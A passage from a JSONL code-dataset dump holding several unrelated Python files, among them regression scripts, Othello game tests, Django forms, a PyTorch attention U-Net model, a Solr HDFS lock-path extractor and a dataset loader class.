'y-')\nplt.xlim(1,50)\nplt.ylabel('损失值')\nplt.xlabel('迭代次数')\nplt.grid(linestyle=':',color='r')\n\nx=np.array([[1,(1650-xmean[0])/xstd[0],(3-xmean[1])/xstd[1]]])\nprint(theta)\nprint(((x@theta)[0,0])*ystd+ymean)\n\nX1=np.hstack((np.ones((len(X1),1)),X1))\ntheta2=normalEql(X1,Y1)\nx2=np.array([[1,1650,3]])\nprint(x2@theta2)\n\ntheta=np.zeros(3)\nresult=op.minimize(fun=costFunction,x0=theta.reshape(3,),args=(X,Y),jac=gradient,method='TNC',options={'maxiter':400})\ntheta=(result.x).reshape(len(result.x),1)\nprint(((x@theta)[0,0])*ystd+ymean)\n\n# plt.show()\n","sub_path":"line_regression/multi_ex1.py","file_name":"multi_ex1.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"67507806","text":"from game_manager import GameManager\nfrom game_controller import GameController\nfrom board import Board\n\n\ndef test_constructor():\n '''Test initialization of GameController\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n assert gm.player_turn\n assert gm.board == bd\n assert gm.print_turn\n assert gm.prompt_name\n\n\ndef test_is_legal_move():\n '''Test is_legal_move method to make sure legal and non-legal moves\n are handeled correctly.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n assert not gm.is_legal_move(0, 0)\n assert gm.is_legal_move(0, 1) == [[1, 1]]\n assert gm.is_legal_move(1, 0) == [[1, 1]]\n gm.player_turn = False\n assert not gm.is_legal_move(1, 1)\n assert gm.is_legal_move(2, 0) == [[2, 1]]\n assert gm.is_legal_move(3, 1) == [[2, 1]]\n assert gm.is_legal_move(0, 2) == [[1, 2]]\n assert gm.is_legal_move(1, 3) == [[1, 2]]\n\n\ndef test_real_space():\n '''Test real_space method to make sure spaces that are off\n the board are not counted as real spaces.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n assert gm.real_space(1, 2)\n assert not gm.real_space(4, 2)\n assert gm.real_space(0, 0)\n assert not gm.real_space(-1, 0)\n\n\ndef test_flip_tiles():\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n gm.flip_tiles([[1, 1], [0, 1]], 0)\n assert bd.disks[1][1].fill_color == 'black'\n assert bd.disks[0][1].fill_color == 'black'\n assert bd.disks[0][0].fill_color == 'green'\n\n\ndef test_ai_move_decision():\n '''Test if the computer makes the correct deicion for\n certain tile situations on board.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Change space (2, 2) to black and (2, 3) to white.\n # Now best move should be space (2, 0)\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(2, 3, 255)\n gm.player_turn = False\n assert gm.ai_move_decision() == (2, 0)\n bd.tile.change_color(2, 0, 0)\n bd.tile.change_color(0, 2, 255)\n assert gm.ai_move_decision() == (3, 2)\n # Change all tiles to black so there are no legal moves.\n # method should return False\n bd.tile.change_color(1, 1, 0)\n bd.tile.change_color(0, 2, 0)\n bd.tile.change_color(2, 3, 0)\n assert not gm.ai_move_decision()\n\n\ndef test_player_make_move():\n '''Test that the player move is legal and the game is not\n over\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Check that a legal move causes player turn to change to False\n # and the correct tiles are on the board\n gm.player_turn = True\n gm.player_make_move(100, 0)\n assert bd.disks[1][0].fill_color == 'black'\n assert bd.disks[1][1].fill_color == 'black'\n assert not gm.player_turn\n assert gm.print_turn\n # Test that if move is not legal, nothing changes\n gm.player_turn = True\n gm.player_make_move(0, 0)\n assert gm.player_turn\n assert bd.disks[0][0].fill_color == 'green'\n # Test what happens when there are no more legal moves for player\n # but still legal moves for computer\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(1, 3, 255)\n gm.player_make_move(0, 0)\n assert not gm.player_turn\n assert gm.print_turn\n assert not bd.end_game\n # Test when neither ai nor player has a move left\n gm.player_turn = True\n bd.tile.change_color(1, 3, 0)\n gm.player_make_move(0, 0)\n assert bd.end_game\n\n\ndef test_ai_make_move():\n '''Test ai_make_move method to make sure the move is\n being made and that game ends when appropriate \n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Check ai makes the right move when able\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(2, 3, 255)\n gm.player_turn = False\n gm.ai_make_move()\n assert bd.disks[2][0].fill_color == 'white'\n assert bd.disks[2][1].fill_color == 'white'\n assert bd.disks[2][2].fill_color == 'white'\n assert gm.player_turn\n # Check AI passes turn when no moves\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(3, 3, 0)\n bd.tile.change_color(3, 1, 255)\n bd.tile.change_color(1, 3, 255)\n gm.player_turn = False\n gm.ai_make_move()\n assert gm.player_turn\n assert not bd.end_game\n # Check game ends when AI and Player can not make a move\n bd.tile.change_color(0, 0, 0)\n bd.tile.change_color(1, 0, 0)\n bd.tile.change_color(0, 1, 0)\n gm.player_turn = False\n gm.ai_make_move()\n assert gm.player_turn\n assert bd.end_game\n\n\ndef test_update_turn():\n '''Test update_turn to make sure method is called correctly\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n gm.update_turn()\n assert gm.player_turn\n assert not gm.print_turn\n # Can't test when bd.done = True since input method gives no javax module\n # error\n\n\ndef test_highest_score():\n '''Test that specific scores change the order in the file\n and that lower scores are only appended. Use scores_test.txt as test file.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n f = open('scores_test.txt', 'w').close()\n gm.highest_score('Test Name', 35, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n top = f.readlines()[0]\n assert top == 'Test Name 35\\n'\n f.close()\n gm.highest_score('Test Name 2', 20, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n lst = f.readlines()\n top = lst[0]\n second = lst[1]\n assert top == 'Test Name 35\\n'\n assert second == 'Test Name 2 20\\n'\n f.close()\n gm.highest_score('Test Name 3', 36, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n lst = f.readlines()\n top = lst[0]\n second = lst[1]\n last = lst[2]\n assert top == 'Test Name 3 36\\n'\n assert second == 'Test Name 35\\n'\n assert last == 'Test Name 2 20\\n'\n","sub_path":"OthelloGame/game_manager_test.py","file_name":"game_manager_test.py","file_ext":"py","file_size_in_byte":6823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226629208","text":"from django import forms\nfrom business.models import Test, Questions\n\n\n# ---------------------------------------question--------------------------\n\nclass QuestionCreateForm(forms.ModelForm):\n title = forms.CharField()\n question = forms.Textarea()\n\n # script=forms.FileField()\n\n class Meta:\n model = Questions\n fields = [\n 'title',\n 'question',\n 'pod_name',\n 'script'\n\n ]\n '''\n def clean_title(self):\n title = self.cleaned_data.get(\"title\").upper()\n return title\n '''\n\n# --------------------------------------test-------------------------------\nclass TestCreateForm(forms.ModelForm):\n questions = forms.ModelMultipleChoiceField(\n queryset=Questions.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=True\n )\n\n class Meta:\n model = Test\n fields = [\n 'name',\n 'questions',\n ]\n","sub_path":"DevOps Examination System/CODE/devops_23march19/devops/business/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250281462","text":"#USE PYTHON 64 BIT BECAUSE OF THE SIZE OF THE ARRAY\nimport numpy as np\nfrom sklearn.preprocessing import Imputer\n\nC = np.load(\"TestWithoutZipData.npy\")\nE = np.load(\"allDatav3.npy\")\n\n#MISSING VALUES PROBLEM\nimp = Imputer(missing_values='NaN', strategy='mean', axis=0)\nimp.fit(E)\nE = imp.transform(E)\n\n#CREATES EMPTY MATRIX FOR DATA WITH CLASS CLICK\na = np.empty((len(C[:, 0]), len(E[0, :]) + 2), dtype='f')\n\ncounter = 0\nfor i in range(0, len(a[:, 0])):\n #COMBINE THE DATA BY THE ZIP CODE AND GET RID OF THE ZIP\n a[i, 0] = C[i][1] #ALEXA\n a[i, 1] = C[i][2] #AUTHORITY\n a[i, 2] = C[i][3] #CHANCE TO BE CLICKED\n\n if C[i][0] != -1:\n t = np.where(C[i][0] == E[:, 0])\n\n #IF THERE IS NO ENTRY FOR THAT ZIP CODES ADD ONLY DOMAIN DATA\n if len(t[0]) > 0:\n a[i, 3:] = E[t[0][0]][1:] #ZIPCODE DATA\n\n else:\n a[i, 3] = -1\n\n else:\n a[i, 3] = -1\n\n #PROGRESS INDICATOR\n if counter % 100000 == 0:\n print(counter )\n counter += 1\n\n\nnp.save(\"testFINAL\", a)","sub_path":"Clustering and atribute chosing/numpyData/final_Clusters/Final Prediction Test Set/Preparing Train and Test data/CombineTestwithZipData.py","file_name":"CombineTestwithZipData.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217226354","text":"\n\nfrom xai.brain.wordbase.nouns._enthusiasm import _ENTHUSIASM\n\n#calss header\nclass _ENTHUSIASMS(_ENTHUSIASM, ):\n\tdef __init__(self,): \n\t\t_ENTHUSIASM.__init__(self)\n\t\tself.name = \"ENTHUSIASMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enthusiasm\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_enthusiasms.py","file_name":"_enthusiasms.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"39418606","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 15 18:15:03 2020\r\n\r\n@author: Lishen Qiu\r\n\"\"\"\r\nfrom __future__ import division\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch\r\nfrom numpy.linalg import svd\r\nfrom numpy.random import normal\r\nimport math\r\nfrom math import sqrt\r\nfrom torchsummary import summary\r\nimport scipy.io as io\r\nimport numpy as np\r\nimport torch.optim as optim\r\nimport torch.utils.data \r\nimport torch\r\nimport os\r\nimport os.path as osp\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\nclass ChannelAttention(nn.Module):\r\n def __init__(self, in_planes, ratio):\r\n super(ChannelAttention, self).__init__()\r\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n self.max_pool = nn.AdaptiveMaxPool2d(1)\r\n self.fc1 = nn.Conv2d(in_planes, in_planes // ratio, 1, bias=False)\r\n self.relu1 = nn.ReLU()\r\n self.fc2 = nn.Conv2d(in_planes // ratio, in_planes, 1, bias=False)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\r\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\r\n out = avg_out + max_out\r\n return self.sigmoid(out)\r\n\r\nclass SpatialAttention(nn.Module):\r\n def __init__(self,kernel_size_L,kernel_size_W,stride):\r\n super(SpatialAttention, self).__init__()\r\n self.conv1 = nn.Conv2d(2, 1, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n avg_out = torch.mean(x, dim=1, keepdim=True)\r\n max_out, _ = torch.max(x, dim=1, keepdim=True)\r\n x = torch.cat([avg_out, max_out], dim=1)\r\n x = self.conv1(x)\r\n return self.sigmoid(x)\r\n\r\nclass SELayer(nn.Module):\r\n def __init__(self, channel, reduction):\r\n super(SELayer, self).__init__()\r\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n# print(self.avg_pool.size())\r\n self.fc = nn.Sequential(\r\n nn.Linear(channel, channel // reduction, bias=False),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(channel // reduction, channel, bias=False),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n b, c, _, _ = x.size()\r\n y = self.avg_pool(x).view(b, c)\r\n y = self.fc(y).view(b, c, 1, 1)\r\n return x * y.expand_as(x)\r\n\r\n \r\n\r\nclass conv_1_block_DW(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_DW, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x\r\n \r\nclass conv_1_block_MD(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_MD, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n \r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x\r\n\r\nclass conv_1_block_UP(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_UP, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x \r\n \r\nclass Context_comparison(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(Context_comparison, self).__init__()\r\n \r\n self.conv1 = nn.Sequential(\r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,(kernel_size_W+7)//2), bias=True,dilation=5),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n self.conv1m1 = nn.Conv2d(in_channels=out_ch*3, out_channels=out_ch, kernel_size=(1,1),padding=0) \r\n def forward(self, x):\r\n x1 = self.conv1(x)\r\n x1 = self.ca(x1)* x1\r\n x1 = self.conv1(x1)\r\n x1 = self.ca(x1)* x1\r\n \r\n x2 = self.conv2(x)\r\n x2 = self.ca(x2)* x2\r\n x2 = self.conv2(x2)\r\n x2 = self.ca(x2)* x2\r\n# print(x1.shape)\r\n# print(x2.shape)\r\n x3=x1-x2\r\n# print(x1.shape)\r\n# print(x3.shape)\r\n xout = torch.cat((x1,x2,x3), 1) \r\n# print(xout.shape)\r\n xout=self.conv1m1(xout)\r\n return xout \r\n \r\nclass IMUnet(nn.Module):#库中的torch.nn.Module模块\r\n def __init__(self,in_channels =1):\r\n super(IMUnet, self).__init__()\r\n \r\n self.conv1_1=conv_1_block_DW( 1, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv1_2=conv_1_block_DW(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv1_3=conv_1_block_DW(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n \r\n self.conv2_1=conv_1_block_DW(16, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv2_2=conv_1_block_DW(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv2_3=conv_1_block_DW(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n \r\n self.conv3_1=conv_1_block_DW(32, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv3_2=conv_1_block_DW(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv3_3=conv_1_block_DW(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n \r\n self.conv4_1=conv_1_block_MD(48, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n# self.conv4_2=conv_1_block_MD(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n self.conv4_2=Context_comparison(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n self.conv4_3=conv_1_block_MD(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n \r\n self.conv5_1=conv_1_block_UP(48+64, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv5_2=conv_1_block_UP(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv5_3=conv_1_block_UP(48, 32, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n \r\n self.conv6_1=conv_1_block_UP(32+32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv6_2=conv_1_block_UP(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv6_3=conv_1_block_UP(32, 16, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n \r\n self.conv7_1=conv_1_block_UP(16+16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv7_2=conv_1_block_UP(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv7_3=conv_1_block_UP(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n \r\n self.conv1m1 = nn.Conv2d(in_channels=16, out_channels=1, kernel_size=(1,1),padding=0) \r\n \r\n self.avepool1 = nn.AvgPool2d((1, 5), stride=5) \r\n self.avepool2 = nn.AvgPool2d((1, 2), stride=2)\r\n self.avepool3 = nn.AvgPool2d((1, 2), stride=2)\r\n \r\n self.up1 = nn.Upsample(size=(1, 360), scale_factor=None, mode='bilinear', align_corners=None) \r\n self.up2 = nn.Upsample(size=(1, 720), scale_factor=None, mode='bilinear', align_corners=None) \r\n self.up3 = nn.Upsample(size=(1, 3600), scale_factor=None, mode='bilinear', align_corners=None) \r\n \r\n\r\n def forward(self, x):# print(x.shape)\r\n\r\n x1_1 = self.conv1_1(x)\r\n x1_2 = self.conv1_2(x1_1)\r\n x1_3 = self.conv1_3(x1_2) \r\n x1 = self.avepool1(x1_3)\r\n\r\n x2_1 = self.conv2_1(x1)\r\n x2_2 = self.conv2_2(x2_1)\r\n x2_3 = self.conv2_3(x2_2)\r\n x2 = self.avepool2(x2_3)\r\n\r\n x3_1 = self.conv3_1(x2)\r\n x3_2 = self.conv3_2(x3_1)\r\n x3_3 = self.conv3_3(x3_2)\r\n x3 = self.avepool3(x3_3)\r\n \r\n x4_1 = self.conv4_1(x3)\r\n x4_2 = self.conv4_2(x4_1)\r\n x4 = self.conv4_3(x4_2)\r\n\r\n x4 = self.up1(x4)\r\n# print(x4.shape)\r\n# print(x3_3.shape)\r\n x4 = torch.cat((x4, x3_3), 1) \r\n x5_1 = self.conv5_1(x4)\r\n x5_1=x5_1.add(x3_3)\r\n# x5_1 = torch.add((x5_1, x3_3)) \r\n x5_2 = self.conv5_2(x5_1)\r\n# x5_2 = torch.add((x5_2, x3_3)) \r\n x5_2=x5_2.add(x3_3)\r\n x5 = self.conv5_3(x5_2)\r\n\r\n x5 = self.up2(x5)\r\n x5 = torch.cat((x5, x2_3), 1) \r\n x6_1 = self.conv6_1(x5)\r\n# x6_1 = torch.add((x6_1, x2_3)) \r\n x6_1=x6_1.add(x2_3)\r\n x6_2 = self.conv6_2(x6_1) \r\n x6_2=x6_2.add(x2_3)\r\n x6 = self.conv6_3(x6_2)\r\n\r\n\r\n x6 = self.up3(x6)\r\n x6 = torch.cat((x6, x1_3), 1) \r\n x7_1 = self.conv7_1(x6)\r\n x7_1=x7_1.add(x1_3)\r\n x7_2 = self.conv7_2(x7_1)\r\n x7_2=x7_2.add(x1_3)\r\n x7 = self.conv7_3(x7_2)\r\n\r\n Xout = self.conv1m1(x7)\r\n\r\n return Xout\r\n \r\n \r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # PyTorch v0.4.0\r\nmodel = IMUnet().to(device)\r\nsummary(model, (1,1,3600))","sub_path":"Stage1_IMUnet.py","file_name":"Stage1_IMUnet.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242891343","text":"# -*- coding: utf-8 -*-\n\n'''\nfootfall_BANDUNG_20160501_shard3_replica1: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException:\nIndex dir 'hdfs://virapapp61.telkomsel.co.id:8020/solr6/footfall_BANDUNG_20160501/core_node3/data/index/'\nof core 'footfall_BANDUNG_20160501_shard3_replica1' is already locked. The most likely cause is another Solr server\n(or another solr core in this server) also configured to use this directory; other possible causes may be specific to lockType: hdfs\n'''\n\nimport re\n\ninput_file = '/Users/shixinluo/Downloads/collection_lock.txt'\n\noutput_file = '/Users/shixinluo/Downloads/collection_lock_format.txt'\n\nfo = open(output_file,'w')\n\nwith open(input_file, 'r') as fi:\n for line in fi:\n m = re.search(r'(hdfs://.*?/\\')', line)\n if m:\n fo.write(m.group(0)[:-2]+'/write.lock\\n')\n\nfo.close()\n\n","sub_path":"TEST/extract_dir.py","file_name":"extract_dir.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"292750107","text":"import numpy as np\n\n\nclass Dataset(object):\n \"\"\" Skeletons of a dataset \"\"\"\n\n # Is this ugly?\n def __init__(self, feature_names=np.array([]), target_names=np.array([]),\n data=np.array([]), target=np.array([]), DESCR=\"\"):\n self.feature_names = feature_names\n self.target_names = target_names\n self.data = data\n self.target = target\n self.DESCR = DESCR\n\n def set_feature_names(self, feature_names):\n self.feature_names = feature_names\n\n def set_target_names(self, target_names):\n self.target_names = target_names\n\n def set_data(self, data):\n self.data = data\n\n def set_target(self, target):\n self.target = target\n\n def set_DESCR(self, DESCR):\n self.DESCR = DESCR\n\n def load_from_txts_if_categorical(self, names_file, data_file):\n with open(names_file) as f:\n self.DESCR = f.readlines()\n\n # I transpose completely for my ease of thinking\n raw_data = np.genfromtxt(data_file, dtype=str, delimiter=',').T\n\n # Feature key as dict\n feature_key = {}\n feature_num = 0\n for nd_feature in raw_data:\n cat_value = 0\n feature = {}\n for nd_cat in np.unique(nd_feature):\n feature[str(nd_cat)] = cat_value\n cat_value += 1\n feature_key[feature_num] = feature\n feature_num += 1\n\n # does order matter? I don't see how we could change this dynamically\n self.feature_key = feature_key\n\n for y in range(len(raw_data)):\n for x in range(len(raw_data[y])):\n raw_data[y][x] = feature_key[y][str(raw_data[y][x])]\n\n self.data = raw_data[:len(raw_data) - 1].T.astype(np.float)\n self.target = raw_data[len(raw_data) - 1:].T.astype(np.float).flatten()\n\n\n # This kind of is still specific to iris dataset :/\n def load_from_txts_if_numerical(self, names_file, data_file):\n with open(names_file) as f:\n self.DESCR = f.readlines()\n\n raw_data = np.genfromtxt(data_file, dtype=str, delimiter=',')\n\n self.data = raw_data[:, :len(raw_data[0])-1].astype(np.float)\n\n raw_targets = raw_data[:, len(raw_data[0]) - 1:]\n target_key = {}\n target_num = 0\n for nd_target in np.unique(raw_targets):\n target_key[str(nd_target)] = target_num\n target_num += 1\n\n for x in range(len(raw_targets)):\n raw_targets[x] = target_key[raw_targets[x][0]]\n\n self.target = raw_targets.astype(np.float).flatten()\n\n\n def load_dataset_from_iris_csv(self, csv_file):\n csv = np.genfromtxt(csv_file, dtype=str, delimiter=\",\")\n for x in range(len(csv)):\n for y in range(len(csv[x])):\n csv[x][y] = csv[x][y].replace(\"\\\"\", \"\")\n\n self.feature_names = csv[:1, 1:5]\n self.target_names = np.array(set(csv[1:, 5:6].flatten()))\n self.data = csv[1:, 1:5].astype(np.float)\n self.target = csv[1:, 5:6]\n\n for index in range(len(self.target)):\n if self.target[index] == 'setosa':\n self.target[index] = 0\n elif self.target[index] == 'versicolor':\n self.target[index] = 1\n elif self.target[index] == 'virginica':\n self.target[index] = 2\n self.target = self.target.flatten().astype(np.int)\n","sub_path":"kNN/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"416737745","text":"#this is - Polynomial Linear Regression Excersize\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import linear_model\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import preprocessing\r\n\r\nX=pd.read_csv('Poly_LR.csv')\r\ny=X.Salary\r\nX=X.drop(['Position','Salary'],axis=1)\r\n\r\n#this is linear Regression \r\nl_model = linear_model.LinearRegression()\r\n\r\nl_model.fit(X,y)\r\n\r\n#graph to show how it is not perfect/good for our example\r\nplt.scatter(X,y,color='r')\r\nplt.plot(X,l_model.predict(X),color='b')\r\nplt.show()\r\n\r\n# use of polynomial Linear Regression\r\npl_model = preprocessing.PolynomialFeatures(3)\r\nX_poly = pl_model.fit_transform(X)\r\n\r\nl_model_new = linear_model.LinearRegression()\r\n\r\nl_model_new.fit(X_poly,y)\r\n\r\n#graph to show how it is perfect/good for our example\r\nplt.scatter(X,y,color='r')\r\nplt.plot(X,l_model_new.predict(X_poly),color='b')\r\nplt.title('Position-Salary Mapping')\r\nplt.xlabel('Position Level')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#lets store this trained model\r\nimport pickle\r\n\r\npickle.dump(l_model_new,open('Poly_LR_Model.pkl','wb'))\r\n\r\nLoaded_model = pickle.load(open('Poly_LR_Model.pkl','rb'))\r\n\r\nprint(Loaded_model.predict([[1,4,16,64]]))\r\n\r\n#below is for Polynomial Linear Regression exercize for Social Ads\r\n#not polynomial. Its seems to be logistics regression\r\n\r\nX1=pd.read_csv('lr_poly_social_ads.csv')\r\nX1.describe()\r\nX1.info()\r\ny1 = X1.Purchased\r\nX1 = X1.drop(['User ID'],axis = 1)\r\nX1.replace(['Male','Female'],['1','0'], inplace = True)\r\n","sub_path":"Poly_LR.py","file_name":"Poly_LR.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"498832703","text":"\"\"\"\ndodanie do pliku konf wartości typu email=marian@gmail.com\nobsługa wyjątków, błedna scieżka, brak uprawnien do zapisu, nieistniejący klucz w słowniku\n Usages:\n ./assignment_3.py (reads out the entire config dict)\n ./assignment_3.py thiskey thisvalue (sets 'thiskey' and 'thisvalue' in the dict)\n\"\"\"\nimport os\nimport pickle\n\nclass ConfigKeyError(Exception): # klasa obsługi wyjątku braku klucza, wywołanie nieistaniejącego klucza np cd['klucz4']\n def __init__(self, this, key): # this to przekazany obiekt konfliktu typu dict, self to obiekt konfliktu self, key to nieistniejący klucz\n self.key = key\n self.keys = this.keys() # keys - klucze dostepne w konflikcie dict (chcemy pokazac użytkownikowi które klucze są dostępne jesli wywołał klucz nieistniejący)\n def __str__(self): # funkcja __str__ działa kiedy nastąpi wyjątek\n return 'key \"{0}\" not found. Avialable keys: ({1})'.format(self.key, ', '.join(self.keys))\n\nclass ConfigDict(dict):\n\n config_directory = 